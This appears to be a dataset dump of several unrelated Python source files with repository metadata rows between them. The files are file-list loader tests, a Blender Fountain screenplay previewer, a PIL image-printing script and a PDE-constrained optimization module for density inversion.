            f.write('\n'.join(['url', FILE_1, FILE_2]))
            f.flush()
            assert load_csv_or_tsv_file_list(f.name, 'url') == [FILE_1, FILE_2]
    def test_should_read_multiple_file_paths_from_file_with_header_using_column_index(self):
        with NamedTemporaryFile('w') as f:
            f.write('\n'.join(['url', FILE_1, FILE_2]))
            f.flush()
            assert load_csv_or_tsv_file_list(f.name, 0) == [FILE_1, FILE_2]
    def test_should_read_multiple_file_paths_from_file_without_header(self):
        with NamedTemporaryFile('w') as f:
            f.write('\n'.join([FILE_1, FILE_2]))
            f.flush()
            assert load_csv_or_tsv_file_list(f.name, 0, header=False) == [FILE_1, FILE_2]
    def test_should_read_unicode_file(self):
        with NamedTemporaryFile('wb') as f:
            f.write('\n'.join(['url', UNICODE_FILE_1]).encode('utf-8'))
            f.flush()
            assert load_csv_or_tsv_file_list(f.name, 'url') == [UNICODE_FILE_1]
    def test_should_raise_exception_if_column_name_is_invalid(self):
        # NOTE(review): the assert inside pytest.raises is unreachable once
        # the call raises; only the exception type is really checked.
        with pytest.raises(ValueError):
            with NamedTemporaryFile('w') as f:
                f.write('\n'.join(['url', FILE_1, FILE_2]))
                f.flush()
                assert load_csv_or_tsv_file_list(f.name, 'xyz') == [FILE_1, FILE_2]
    def test_should_raise_exception_if_column_index_is_invalid(self):
        with pytest.raises(IndexError):
            with NamedTemporaryFile('w') as f:
                f.write('\n'.join(['url', FILE_1, FILE_2]))
                f.flush()
                assert load_csv_or_tsv_file_list(f.name, 1) == [FILE_1, FILE_2]
    def test_should_apply_limit(self):
        with NamedTemporaryFile('w') as f:
            f.write('\n'.join(['url', FILE_1, FILE_2]))
            f.flush()
            assert load_csv_or_tsv_file_list(f.name, 'url', limit=1) == [FILE_1]
class TestToAbsoluteFileList:
    """Converting relative paths to absolute against a base path."""
    def test_should_make_path_absolute(self):
        assert to_absolute_file_list('/base/path', ['sub/file1']) == ['/base/path/sub/file1']
    def test_should_not_change_absolute_paths(self):
        assert to_absolute_file_list('/base/path', ['/other/file1']) == ['/other/file1']
class TestToRelativeFileList:
    """Converting absolute paths to relative against a base path."""
    def test_should_make_path_relative(self):
        # renamed from the copy-pasted "test_should_make_path_absolute":
        # this suite exercises the *relative* conversion
        assert to_relative_file_list('/base/path', ['/base/path/sub/file1']) == ['sub/file1']
    def test_should_not_change_path_outside_base_path(self):
        assert to_relative_file_list('/base/path', ['/other/file1']) == ['/other/file1']
@pytest.mark.usefixtures(
    'load_plain_file_list_mock', 'load_csv_or_tsv_file_list_mock', 'to_absolute_file_list_mock'
)
class TestLoadFileList:
    """load_file_list dispatches on extension and optionally absolutizes paths."""
    def test_should_call_load_plain_file_list(self, load_plain_file_list_mock):
        result = load_file_list(
            'file-list.lst', column='url', header=True, limit=1, to_absolute=False
        )
        load_plain_file_list_mock.assert_called_with('file-list.lst', limit=1)
        assert result == load_plain_file_list_mock.return_value
    def test_should_call_load_csv_or_tsv_file_list(self, load_csv_or_tsv_file_list_mock):
        result = load_file_list(
            'file-list.csv', column='url', header=True, limit=1, to_absolute=False
        )
        load_csv_or_tsv_file_list_mock.assert_called_with(
            'file-list.csv', column='url', header=True, limit=1
        )
        assert result == load_csv_or_tsv_file_list_mock.return_value
    def test_should_make_file_list_absolute(
            self, load_plain_file_list_mock, to_absolute_file_list_mock):
        # base path is derived from the directory of the list file itself
        result = load_file_list('/base/path/file-list.lst', column='url', to_absolute=True)
        to_absolute_file_list_mock.assert_called_with(
            '/base/path', load_plain_file_list_mock.return_value
        )
        assert result == to_absolute_file_list_mock.return_value
class TestSavePlainFileList:
    """Round-trip write/read of plain file lists."""
    def test_should_write_multiple_file_paths(self):
        with TemporaryDirectory() as path:
            file_list_path = os.path.join(path, 'out.lst')
            save_plain_file_list(file_list_path, [FILE_1, FILE_2])
            assert load_plain_file_list(file_list_path) == [FILE_1, FILE_2]
    def test_should_write_unicode_file(self):
        with TemporaryDirectory() as path:
            file_list_path = os.path.join(path, 'out.lst')
            save_plain_file_list(file_list_path, [UNICODE_FILE_1])
            assert load_plain_file_list(file_list_path) == [UNICODE_FILE_1]
class TestSaveCsvOrTsvFileList:
    """Round-trip write/read of csv/tsv file lists with a column header."""
    def test_should_write_multiple_file_paths(self):
        with TemporaryDirectory() as path:
            file_list_path = os.path.join(path, 'out.csv')
            save_csv_or_tsv_file_list(file_list_path, [FILE_1, FILE_2], column='url')
            assert load_csv_or_tsv_file_list(file_list_path, column='url') == [FILE_1, FILE_2]
    def test_should_write_unicode_file(self):
        with TemporaryDirectory() as path:
            # NOTE(review): uses an .lst name in the csv/tsv suite -- presumably
            # the save/load pair still uses csv formatting here; confirm intent
            file_list_path = os.path.join(path, 'out.lst')
            save_csv_or_tsv_file_list(file_list_path, [UNICODE_FILE_1], column='url')
            assert load_csv_or_tsv_file_list(file_list_path, column='url') == [UNICODE_FILE_1]
class TestSaveFileList:
    """save_file_list dispatches to the plain or csv/tsv writer by extension."""
    def test_should_call_save_plain_file_list(self):
        with patch.object(file_list_loader, 'save_plain_file_list') as mock:
            save_file_list('file-list.lst', FILE_LIST, column='url', header=True)
            mock.assert_called_with('file-list.lst', FILE_LIST)
    def test_should_call_save_csv_or_tsv_file_list(self):
        with patch.object(file_list_loader, 'save_csv_or_tsv_file_list') as mock:
            save_file_list('file-list.csv', FILE_LIST, column='url', header=True)
            mock.assert_called_with('file-list.csv', FILE_LIST, column='url', header=True)
| 39.657407 | 95 | 0.697175 |
c25eb9863d76a47e04a0349c62c58634066b728d | 344 | py | Python | _includes/code/algorithms/motor-controllers/sample-controller-class.py | xiaoxiae/Robotics-Simplified-Website | ab6c683695ecb758f746923bee3c2355ffbc76b9 | [
"MIT"
] | 3 | 2019-04-11T12:08:57.000Z | 2019-04-15T09:35:57.000Z | _includes/code/algorithms/motor-controllers/sample-controller-class.py | xiaoxiae/Robotics-Simplified-Website | ab6c683695ecb758f746923bee3c2355ffbc76b9 | [
"MIT"
] | null | null | null | _includes/code/algorithms/motor-controllers/sample-controller-class.py | xiaoxiae/Robotics-Simplified-Website | ab6c683695ecb758f746923bee3c2355ffbc76b9 | [
"MIT"
] | null | null | null | class SampleControllerClass:
"""Description of the class."""
def __init__(self, ...):
"""Creates a controller object."""
pass
def set_goal(self, goal):
"""Sets the goal of the controller."""
pass
def get_value(self):
"""Returns the current controller value"""
pass | 24.571429 | 51 | 0.555233 |
f3648aa474a0c222667afb4522d1faa64140865a | 9,993 | py | Python | operators/preview_fountain.py | b4zz4/Blender_Screenwriter | 41538dcb5881f12c9c06324d6a932c8b981eac3a | [
"MIT"
] | null | null | null | operators/preview_fountain.py | b4zz4/Blender_Screenwriter | 41538dcb5881f12c9c06324d6a932c8b981eac3a | [
"MIT"
] | null | null | null | operators/preview_fountain.py | b4zz4/Blender_Screenwriter | 41538dcb5881f12c9c06324d6a932c8b981eac3a | [
"MIT"
] | null | null | null | import bpy, textwrap, os, sys
from .. import fountain
from pathlib import Path
class SCREENWRITER_OT_preview_fountain(bpy.types.Operator):
    '''Updates the preview'''
    bl_idname = "scene.preview_fountain"
    bl_label = "Refresh"

    @classmethod
    def poll(cls, context):
        # Only available in a Text Editor showing a *.fountain document.
        space = bpy.context.space_data
        try:
            filepath = space.text.name
            if filepath.strip() == "":
                return False
            return ((space.type == 'TEXT_EDITOR')
                    and Path(filepath).suffix == ".fountain")
        except AttributeError:
            return False

    def execute(self, context):
        """Render the active .fountain text into a formatted "Preview.txt"
        text block and move its cursor to mirror the source cursor."""
        script_dir = os.path.dirname(bpy.data.filepath)  # renamed: "dir" shadowed the builtin
        if script_dir not in sys.path:
            sys.path.append(script_dir)
        filename = "Preview.txt"
        if filename not in bpy.data.texts:
            bpy.data.texts.new(filename)  # New document in Text Editor
        else:
            bpy.data.texts[filename].clear()  # Clear existing text
        current_text = bpy.context.space_data.text.name
        # Blender operators must return a status set; the original bare
        # "return" here was invalid.
        if current_text.strip() == "":
            return {"CANCELLED"}
        fountain_script = bpy.context.area.spaces.active.text.as_string()
        if fountain_script.strip() == "":
            return {"CANCELLED"}
        F = fountain.Fountain(fountain_script)

        # Get number of header lines so the cursor position can be mapped
        # from the source document to the rendered preview.
        contents = fountain_script.strip().replace('\r', '')
        contents_has_metadata = ':' in contents.splitlines()[0]
        contents_has_body = '\n\n' in contents
        if contents_has_metadata and contents_has_body:
            lines = fountain_script.split('\n\n')
            lines = lines[0].splitlines()
            current_line = bpy.data.texts[current_text].current_line_index - len(lines) - 1
        else:
            current_line = bpy.data.texts[current_text].current_line_index
        bpy.context.scene.title_page_index = current_line

        # Layout constants (monospaced screenplay page)
        current_character = bpy.data.texts[current_text].current_character
        jump_to_line = 0
        margin = " " * 4
        document_width = 60 + len(margin)
        document_height = 56
        action_wrapper = textwrap.TextWrapper(width=document_width)
        dialogue_wrapper = textwrap.TextWrapper(width=37 + int(len(margin) / 2))
        dialogue_indentation = 13 + int(len(margin) / 2)
        cursor_indentation = margin
        cursor_indentation_actual = ""
        end_line_title = ""
        contact_indent = ""  # " "*35

        # Add a Title Page
        if contents_has_metadata:
            for meta in iter(F.metadata.items()):
                if meta[0] == 'title':
                    # blank lines above the title
                    for l in range(int(document_height / 2.5) - len(meta[1])):
                        bpy.data.texts[filename].write(chr(10))
                    # title
                    for i in meta[1]:
                        bpy.data.texts[filename].write(margin + ((str(i)).center(document_width) + chr(10)))
                        end_line_title = str(i)
                elif meta[0] == 'credit' or meta[0] == 'credits':
                    for i in meta[1]:
                        bpy.data.texts[filename].write(chr(10) + margin + (str(i).center(document_width) + chr(10) + chr(10)))
                        end_line_title = str(i)
                elif meta[0] == 'author' or meta[0] == 'authors':
                    for i in meta[1]:
                        bpy.data.texts[filename].write(margin + (str(i).center(document_width) + chr(10) + chr(10)))
                        end_line_title = str(i)
                elif meta[0] == 'source':
                    for i in meta[1]:
                        bpy.data.texts[filename].write(chr(10) + margin + (str(i).center(document_width) + chr(10)))
                        end_line_title = str(i)
                elif meta[0] == 'draft date' or meta[0] == 'date':
                    for i in meta[1]:
                        bpy.data.texts[filename].write(contact_indent + margin + (str(i) + chr(10)))
                elif meta[0] == 'contact':
                    for i in meta[1]:
                        bpy.data.texts[filename].write(contact_indent + margin + (str(i) + chr(10)))
                elif meta[0] == 'notes':
                    for i in meta[1]:
                        bpy.data.texts[filename].write(contact_indent + margin + (str(i) + chr(10)))
                elif meta[0] == 'copyright':
                    for i in meta[1]:
                        bpy.data.texts[filename].write(contact_indent + margin + (str(i) + chr(10)))
            # insert blank lines after the last title-block line.
            # The original guard "end_line_title != 0" was always true: when no
            # title-ish key exists, str.replace("", ...) would corrupt the text.
            if end_line_title != "":
                cli = bpy.data.texts[filename].current_line_index
                blank_lines = ""
                for l in range(document_height - cli - 2):
                    blank_lines = blank_lines + chr(10)
                txt = bpy.data.texts[filename].as_string()
                text = txt.replace(end_line_title, end_line_title + blank_lines)
                bpy.data.texts[filename].clear()
                bpy.data.texts[filename].write(text)
            # add pagebreak
            bpy.data.texts[filename].write(chr(10) + margin + ("_" * document_width) + chr(10))

        # Body elements. Boneyard / Comment / Section Heading / Synopsis are
        # ignored by Fountain formatting and simply not rendered.
        for f in F.elements:
            if f.element_type == 'Scene Heading':
                if str(f.scene_number) != "":
                    f.scene_number = f.scene_number + " "
                bpy.data.texts[filename].write(
                    margin + f.scene_number + f.scene_abbreviation.upper() + " " + f.element_text.upper() + chr(10))
                cursor_indentation = margin
            elif f.element_type == 'Action' and f.is_centered == False:
                action = f.element_text
                action_list = action_wrapper.wrap(text=action)
                for action in action_list:
                    bpy.data.texts[filename].write(margin + action + chr(10))
                cursor_indentation = margin
            elif f.element_type == 'Action' and f.is_centered == True:
                bpy.data.texts[filename].write(
                    margin + f.element_text.center(document_width) + chr(10))
                cursor_indentation = margin + ("_" * (int(
                    (document_width / 2 - len(f.element_text) / 2)) - 2))
            elif f.element_type == 'Character':
                bpy.data.texts[filename].write(
                    margin + f.element_text.center(document_width).upper() +
                    chr(10))
                cursor_indentation = margin + ("_" * ((f.element_text.center(
                    document_width)).find(f.element_text)))
            elif f.element_type == 'Parenthetical':
                bpy.data.texts[filename].write(
                    margin + f.element_text.center(document_width).lower() +
                    chr(10))
                cursor_indentation = margin + ("_" * int(
                    (document_width / 2 - len(f.element_text) / 2)))
            elif f.element_type == 'Dialogue':
                dialogue = f.element_text
                line_list = dialogue_wrapper.wrap(text=dialogue)
                for dialogue in line_list:
                    bpy.data.texts[filename].write(margin + (
                        " " * dialogue_indentation + dialogue) + chr(10))
                cursor_indentation = margin + (" " * dialogue_indentation)
            elif f.element_type == 'Page Break':
                bpy.data.texts[filename].write(
                    chr(10) + margin + ("_" * document_width) + chr(10))
            elif f.element_type == 'Transition':
                bpy.data.texts[filename].write(
                    margin + f.element_text.rjust(document_width).upper() + chr(10))
                cursor_indentation = margin + ("_" * (
                    document_width - len(f.element_text)))
            elif f.element_type == 'Empty Line':
                bpy.data.texts[filename].write(chr(10))
            # track the preview line matching the source cursor
            if current_line >= f.original_line and f.original_line != 0:
                jump_to_line = bpy.data.texts[filename].current_line_index
                cursor_indentation_actual = cursor_indentation

        line = jump_to_line - 1
        if line < 0:
            line = 0
        bpy.data.texts[filename].current_line_index = line
        cur = current_character + len(cursor_indentation_actual)
        bpy.data.texts[filename].select_set(line, cur, line, cur)
        return {"FINISHED"}
| 46.050691 | 118 | 0.550085 |
921f01e72586d12ccad9c482023901e328161e14 | 638 | py | Python | qu/data/__init__.py | aarpon/qu | a842b25052e9e054beb4d4dcbd529b89de2ccbd6 | [
"Apache-2.0"
] | 6 | 2021-01-26T16:32:54.000Z | 2022-01-18T15:34:13.000Z | qu/data/__init__.py | ciskoh/qu | a9f6903c34f9d21d632521f3e1eca763940c7711 | [
"Apache-2.0"
] | 2 | 2022-01-27T09:32:33.000Z | 2022-01-27T19:43:02.000Z | qu/data/__init__.py | ciskoh/qu | a9f6903c34f9d21d632521f3e1eca763940c7711 | [
"Apache-2.0"
] | 1 | 2021-01-26T16:32:56.000Z | 2021-01-26T16:32:56.000Z | # /********************************************************************************
# * Copyright © 2020-2021, ETH Zurich, D-BSSE, Aaron Ponti
# * All rights reserved. This program and the accompanying materials
# * are made available under the terms of the Apache License Version 2.0
# * which accompanies this distribution, and is available at
# * https://www.apache.org/licenses/LICENSE-2.0.txt
# *
# * Contributors:
# * Aaron Ponti - initial API and implementation
# *******************************************************************************/
#
from .manager import DataManager, MaskType, ExperimentType
| 45.571429 | 85 | 0.526646 |
bca741a3bab4301f33747aa80bf11b305149d1a7 | 2,404 | py | Python | Site_Visit_2.0/venv/bin/pilprint.py | opacichjj/FEMA-PDA-and-Route-Optimizer | d79468438f45216d5abeef5f5037d6a165f61140 | [
"MIT"
] | null | null | null | Site_Visit_2.0/venv/bin/pilprint.py | opacichjj/FEMA-PDA-and-Route-Optimizer | d79468438f45216d5abeef5f5037d6a165f61140 | [
"MIT"
] | null | null | null | Site_Visit_2.0/venv/bin/pilprint.py | opacichjj/FEMA-PDA-and-Route-Optimizer | d79468438f45216d5abeef5f5037d6a165f61140 | [
"MIT"
] | 2 | 2019-08-11T03:34:07.000Z | 2019-10-25T16:57:48.000Z | #!/Users/JO/Desktop/microblog/venv/bin/python3
#
# The Python Imaging Library.
# $Id$
#
# print image files to postscript printer
#
# History:
# 0.1 1996-04-20 fl Created
# 0.2 1996-10-04 fl Use draft mode when converting.
# 0.3 2003-05-06 fl Fixed a typo or two.
#
from __future__ import print_function
VERSION = "pilprint 0.3/2003-05-05"
from PIL import Image
from PIL import PSDraw
# Print box in printer points (1/72 inch): presumably (x0, y0, x1, y1) with
# 1" margins on a US Letter page -- confirm against PSDraw.image usage.
letter = ( 1.0*72, 1.0*72, 7.5*72, 10.0*72 )
def description(file, image):
    """Return a one-line caption: "<basename> (<format> <W>x<H> <mode>)".

    ``file`` is the image path (only its base name without extension is
    used); ``image`` needs ``format``, ``size`` and ``mode`` attributes
    (any PIL Image works). When ``image.format`` is falsy the format name
    is omitted. Avoids the original's shadowing of the builtin ``format``.
    """
    import os
    title = os.path.splitext(os.path.split(file)[1])[0]
    if image.format:
        details = " (%s %dx%d " % (image.format, image.size[0], image.size[1])
    else:
        details = " (%dx%d " % tuple(image.size)
    return title + details + image.mode + ")"
import getopt, os, sys
# Command-line driver: parse options, then render each image file to
# PostScript (to stdout or piped to lpr).
if len(sys.argv) == 1:
    print("PIL Print 0.2a1/96-10-04 -- print image files")
    print("Usage: pilprint files...")
    print("Options:")
    print(" -c colour printer (default is monochrome)")
    print(" -p print via lpr (default is stdout)")
    print(" -P <printer> same as -p but use given printer")
    sys.exit(1)
try:
    opt, argv = getopt.getopt(sys.argv[1:], "cdpP:")
except getopt.error as v:
    print(v)
    sys.exit(1)
printer = None  # print to stdout
monochrome = 1  # reduce file size for most common case
for o, a in opt:
    if o == "-d":
        # debug: show available drivers
        Image.init()
        print(Image.ID)
        sys.exit(1)
    elif o == "-c":
        # colour printer
        monochrome = 0
    elif o == "-p":
        # default printer channel
        printer = "lpr"
    elif o == "-P":
        # printer channel
        printer = "lpr -P%s" % a
for path in argv:  # renamed from "file" (shadowed the builtin)
    try:
        im = Image.open(path)
        title = description(path, im)
        if monochrome and im.mode not in ["1", "L"]:
            # draft mode speeds up the conversion to greyscale
            im.draft("L", im.size)
            im = im.convert("L")
        if printer:
            fp = os.popen(printer, "w")
        else:
            fp = sys.stdout
        ps = PSDraw.PSDraw(fp)
        ps.begin_document()
        ps.setfont("Helvetica-Narrow-Bold", 18)
        ps.text((letter[0], letter[3]+24), title)
        ps.setfont("Helvetica-Narrow-Bold", 8)
        ps.text((letter[0], letter[1]-30), VERSION)
        ps.image(letter, im)
        ps.end_document()
    except Exception:
        # was a bare "except:", which also swallowed KeyboardInterrupt
        # and SystemExit; keep best-effort behavior for real errors only
        print("cannot print image", end=' ')
        print("(%s:%s)" % (sys.exc_info()[0], sys.exc_info()[1]))
| 25.041667 | 67 | 0.56406 |
80a8b0bf822b23e8c65dd21801417d37c5b45670 | 11,956 | py | Python | n2v/methods/pdeco.py | ymshi449/n2v | 9427d97fed9daf303291b4fd9c533ee15b072710 | [
"BSD-3-Clause"
] | null | null | null | n2v/methods/pdeco.py | ymshi449/n2v | 9427d97fed9daf303291b4fd9c533ee15b072710 | [
"BSD-3-Clause"
] | null | null | null | n2v/methods/pdeco.py | ymshi449/n2v | 9427d97fed9daf303291b4fd9c533ee15b072710 | [
"BSD-3-Clause"
] | 1 | 2022-03-09T22:16:25.000Z | 2022-03-09T22:16:25.000Z | """
pdeco.py
Functions associated with PDE-Constrained Optimization.
"""
import numpy as np
from opt_einsum import contract
from scipy.optimize import minimize
from psi4.core import BasisSet as psi4_basiset
from psi4.core import MintsHelper as psi4_mintshelper
class PDECO():
    """
    Performs Optimization as in: 10.1063/1.1535422 - Qin Wu + Weitao Yang

    Attributes:
    -----------
    lambda_reg : {None, float}
        If float, lambda-regularization is added with lambda=lambda_reg.
    regul_norm : {None, float}
        Squared norm ||v||^2 of the last evaluated potential (set when
        regularization is active).
    """
    regul_norm = None  # Regularization norm: ||v||^2
    lambda_reg = None  # Regularization constant

    def pdeco(self, opt_max_iter, reg=None, gtol=1e-3,
              opt_method='L-BFGS-B', opt=None):
        """
        Calls scipy minimizer to minimize lagrangian.

        Parameters
        ----------
        opt_max_iter : int
            Maximum number of optimizer iterations.
        reg : float, optional
            Lambda-regularization constant; None disables regularization.
        gtol : float
            Gradient tolerance passed to the optimizer.
        opt_method : str
            'BFGS' or 'L-BFGS-B' (only these are supported).
        opt : dict, optional
            Extra options forwarded to scipy.optimize.minimize.
        """
        # NOTE: this assignment appeared twice in the original; once suffices.
        self.lambda_reg = reg
        if opt is None:
            opt = {"disp": False}
        opt['maxiter'] = opt_max_iter
        opt['gtol'] = gtol

        # Initialization for D and C
        self._diagonalize_with_potential_pbs(self.v_pbs)
        if self.S4 is None:
            self.S4 = self.fouroverlap()

        if opt_method.lower() == 'bfgs' or opt_method.lower() == 'l-bfgs-b':
            opt_results = minimize(fun=self.lagrangian_pbeco,
                                   x0=self.v_pbs,
                                   jac=self.gradient_pbeco,
                                   method=opt_method,
                                   options=opt
                                   )
        else:
            raise ValueError(F'{opt_method} is not supported. Only BFGS '
                             F'and L-BFGS is supported.')

        if opt_results.success == False:
            # Keep the partial solution around for inspection before raising.
            self.v_pbs = opt_results.x
            self.opt_info = opt_results
            raise ValueError("Optimization was unsucessful (|grad|=%.2e) within %i iterations, "
                             "try a different initial guess. %s"% (np.linalg.norm(opt_results.jac), opt_results.nit, opt_results.message)
                             )
        else:
            print(f"Optimization Successful within {opt_results.nit} iterations! |grad|={np.linalg.norm(opt_results.jac):.2e}." )
            self.v_pbs = opt_results.x
            self.opt_info = opt_results

    def fouroverlap(self, wfn=None):
        r"""
        Calculates four overlap integral with Density Fitting method.
        S4_{ijkl} = \int dr \phi_i(r)*\phi_j(r)*\phi_k(r)*\phi_l(r)

        Parameters
        ----------
        wfn: psi4.core.Wavefunction
            Wavefunction object of molecule; defaults to self.wfn.

        Return
        ------
        S4 : np.ndarray
            Four-index AO overlap tensor, shape (nbf, nbf, nbf, nbf).
        """
        if wfn is None:
            wfn = self.wfn
        # nbf**4 float64 elements -> nbf**4 * 8 bytes.  The original used the
        # ":d" format spec on this float expression (ValueError at runtime)
        # and divided by 8 instead of multiplying by the 8 bytes per element.
        print(f"4-AO-Overlap tensor will take about {self.nbf ** 4 * 8 * 1e-9:.2f} GB.")
        mints = psi4_mintshelper( self.basis )
        aux_basis = psi4_basiset.build(wfn.molecule(), "DF_BASIS_SCF", "",
                                       "JKFIT", wfn.basisset().name())
        S_Pmn = np.squeeze(mints.ao_3coverlap(aux_basis, wfn.basisset(),
                                              wfn.basisset()))
        S_PQ = np.array(mints.ao_overlap(aux_basis, aux_basis))
        # Pseudo-inverse guards against a (near-)singular auxiliary overlap.
        S_PQinv = np.linalg.pinv(S_PQ, rcond=1e-9)
        S4 = np.einsum('Pmn,PQ,Qrs->mnrs', S_Pmn, S_PQinv, S_Pmn, optimize=True)
        return S4

    def lagrangian_pbeco(self, v):
        """
        Lagrangian to be minimized wrt external potential.
        Equation (5) of main reference.
        """
        # If v is not updated, will not re-calculate.
        # NOTE(review): this compares against the *initial* v_pbs, so the
        # cache only helps on the very first evaluation — confirm intended.
        if not np.allclose(v, self.v_pbs, atol=1e-15):
            self._diagonalize_with_potential_pbs(v)

        if self.ref == 1:
            L = 4 * contract("ijkl,ij,kl", self.S4, self.Da - self.Dt[0], self.Da- self.Dt[0])
        else:
            L = contract("ijkl,ij,kl", self.S4, self.Da+self.Db-self.Dt[0]-self.Dt[1], self.Da+self.Db-self.Dt[0]-self.Dt[1])

        # Add lambda-regularization
        if self.lambda_reg is not None:
            T = self.T_pbs
            if self.ref == 1:
                norm = 2 * (v[:self.npbs] @ T @ v[:self.npbs])
            else:
                norm = (v[self.npbs:] @ T @ v[self.npbs:]) + (v[:self.npbs] @ T @ v[:self.npbs])
            L += norm * self.lambda_reg
            self.regul_norm = norm
        return L

    def gradient_pbeco(self, v):
        """
        Calculates gradient wrt target density.
        Equation (11) of main reference.
        """
        # If v is not updated, will not re-calculate.
        if not np.allclose(v, self.v_pbs, atol=1e-15):
            self._diagonalize_with_potential_pbs(v)

        if self.ref == 1:
            grad_temp = np.zeros((self.nbf, self.nbf))
            g = 8 * contract("ijkl,ij,km->lm", self.S4, 2 * (self.Dt[0] - self.Da), self.Coca)  # shape (ao, mo)
            u = 0.5 * contract("lm,lm->m", self.Coca, g)  # shape (mo, )
            g -= 2 * contract('m,ij,jm->im', u, self.S2, self.Coca)  # shape (ao, mo)
            for idx in range(self.nalpha):
                LHS = self.Fock - self.S2 * self.eigvecs_a[idx]
                p_i = np.linalg.solve(LHS, g[:, idx])
                # Gram-Schmidt rotation: project out the occupied orbital.
                p_i -= np.sum(p_i * np.dot(self.S2, self.Coca[:,idx])) * self.Coca[:,idx]
                # NOTE(review): sanity checks via assert are stripped under
                # ``python -O`` — consider raising instead if they must hold.
                assert np.allclose([np.sum(p_i * (self.S2 @ self.Coca[:,idx])), np.linalg.norm(np.dot(LHS,p_i)-g[:, idx]), np.sum(g[:, idx]*self.Coca[:,idx])], 0, atol=1e-4)
                grad_temp += p_i[:, np.newaxis] * self.Coca[:,idx]
            self.grad = contract("ij,ijk->k", grad_temp, self.S3)
        else:
            # Unrestricted reference: alpha and beta blocks handled separately.
            grad_temp_a = np.zeros((self.nbf, self.nbf))
            g_a = 4 * contract("ijkl,ij,km->lm", self.S4, (self.Dt[0] - self.Da) + (self.Dt[1] - self.Db), self.Coca)  # shape (ao, mo)
            u_a = 0.5 * contract("lm,lm->m", self.Coca, g_a)  # shape (mo, )
            g_a -= 2 * contract('m,ij,jm->im', u_a, self.S2, self.Coca)  # shape (ao, mo)
            for idx in range(self.nalpha):
                LHS = self.Fock[0] - self.S2 * self.eigvecs_a[idx]
                p_i = np.linalg.solve(LHS, g_a[:, idx])
                # Gram-Schmidt rotation
                p_i -= np.sum(p_i * np.dot(self.S2, self.Coca[:,idx])) * self.Coca[:,idx]
                assert np.allclose([np.sum(p_i * (self.S2 @ self.Coca[:,idx])), np.linalg.norm(np.dot(LHS,p_i)-g_a[:, idx]), np.sum(g_a[:, idx]*self.Coca[:,idx])], 0, atol=1e-4)
                grad_temp_a += p_i[:, np.newaxis] * self.Coca[:,idx]

            grad_temp_b = np.zeros((self.nbf, self.nbf))
            g_b = 4 * contract("ijkl,ij,km->lm", self.S4, (self.Dt[0] - self.Da) + (self.Dt[1] - self.Db), self.Cocb)  # shape (ao, mo)
            u_b = 0.5 * contract("lm,lm->m", self.Cocb, g_b)  # shape (mo, )
            g_b -= 2 * contract('m,ij,jm->im', u_b, self.S2, self.Cocb)  # shape (ao, mo)
            for idx in range(self.nbeta):
                LHS = self.Fock[1] - self.S2 * self.eigvecs_b[idx]
                p_i = np.linalg.solve(LHS, g_b[:, idx])
                # Gram-Schmidt rotation
                p_i -= np.sum(p_i * np.dot(self.S2, self.Cocb[:,idx])) * self.Cocb[:,idx]
                assert np.allclose([np.sum(p_i * (self.S2 @ self.Cocb[:,idx])), np.linalg.norm(np.dot(LHS,p_i)-g_b[:, idx]), np.sum(g_b[:, idx]*self.Cocb[:,idx])], 0, atol=1e-4)
                grad_temp_b += p_i[:, np.newaxis] * self.Cocb[:,idx]
            self.grad = np.concatenate((contract("ij,ijk->k", grad_temp_a, self.S3), contract("ij,ijk->k", grad_temp_b, self.S3)))

        if self.lambda_reg is not None:
            T = self.T_pbs
            if self.ref == 1:
                rgl_vector = 4 * self.lambda_reg*np.dot(T, v[:self.npbs])
                self.grad += rgl_vector
            else:
                self.grad[:self.npbs] += 2 * self.lambda_reg*np.dot(T, v[:self.npbs])
                self.grad[self.npbs:] += 2 * self.lambda_reg*np.dot(T, v[self.npbs:])
        return self.grad

    def find_regularization_constant_pdeco(self, opt_max_iter, opt_method="L-BFGS-B", gtol=1e-3,
                                           opt=None, lambda_list=None):
        """
        Finding regularization constant lambda.

        Note: it is recommended to set a specific convergence criterion via
        ``opt`` or ``gtol`` so every lambda value is converged identically.
        After the calculation is done, one can plot the returns to select a
        good lambda.

        Parameters:
        -----------
        opt_max_iter: int
            maximum number of iterations for each optimization.
        opt_method: string default: "L-BFGS-B"
            opt_methods available in scipy.optimize.minimize (BFGS family only).
        gtol: float
            Gradient tolerance for termination. See scipy.optimize.minimize.
        opt: dictionary, optional
            if given:
                scipy.optimize.minimize(method=opt_method, options=opt)
        lambda_list: np.ndarray, optional
            A array of lambda to search; otherwise, it will be 10 ** np.linspace(-3, -9, 7).

        Returns:
        --------
        lambda_list: np.ndarray
            A array of lambda searched.
        P_list: np.ndarray
            The value defined by [Bulat, Heaton-Burgess, Cohen, Yang 2007] eqn (21).
            Corresponding to lambda in lambda_list.
        error_list: np.ndarray
            The Ts value for each lambda.
        """
        error_list = []
        v_norm_list = []
        if lambda_list is None:
            lambda_list = 10 ** np.linspace(-3, -9, 7)

        if opt is None:
            opt = {"disp" : False}
        opt['maxiter'] = opt_max_iter
        opt['gtol'] = gtol

        self.lambda_reg = None
        # Initial calculation with no regularization
        # Initialization for D and C
        self._diagonalize_with_potential_pbs(self.v_pbs)
        # Consistency fix: pdeco() builds S4 before optimizing; without this
        # guard, calling this method first would crash in lagrangian_pbeco.
        if self.S4 is None:
            self.S4 = self.fouroverlap()
        if opt_method.lower() == 'bfgs' or opt_method.lower() == 'l-bfgs-b':
            initial_result = minimize(fun=self.lagrangian_pbeco,
                                      x0=self.v_pbs,
                                      jac=self.gradient_pbeco,
                                      method=opt_method,
                                      options=opt
                                      )
        else:
            raise ValueError(F'{opt_method} is not supported. Only BFGS '
                             F'and L-BFGS is supported.')
        if initial_result.success == False:
            raise ValueError("Optimization was unsucessful (|grad|=%.2e) within %i iterations, "
                             "try a different intitial guess"% (np.linalg.norm(initial_result.jac), initial_result.nit)
                             + initial_result.message)
        else:
            error0 = -initial_result.fun
            initial_v_pbs = initial_result.x  # This is used as the initial guess for with regularization calculation.

        for reg in lambda_list:
            self.lambda_reg = reg
            if opt_method.lower() == 'bfgs' or opt_method.lower() == 'l-bfgs-b':
                opt_results = minimize(fun=self.lagrangian_pbeco,
                                       x0=initial_v_pbs,
                                       jac=self.gradient_pbeco,
                                       method=opt_method,
                                       options=opt
                                       )
            else:
                raise ValueError(F'{opt_method} is not supported. Only BFGS '
                                 F'and L-BFGS is supported.')
            v_norm_list.append(self.regul_norm)
            # Subtract the penalty term back out to recover the bare error.
            error_list.append(opt_results.fun - self.lambda_reg * self.regul_norm)

        P_list = lambda_list * np.array(v_norm_list) / (np.array(error_list) - error0)
        return lambda_list, P_list, np.array(error_list)
| 41.370242 | 177 | 0.536467 |
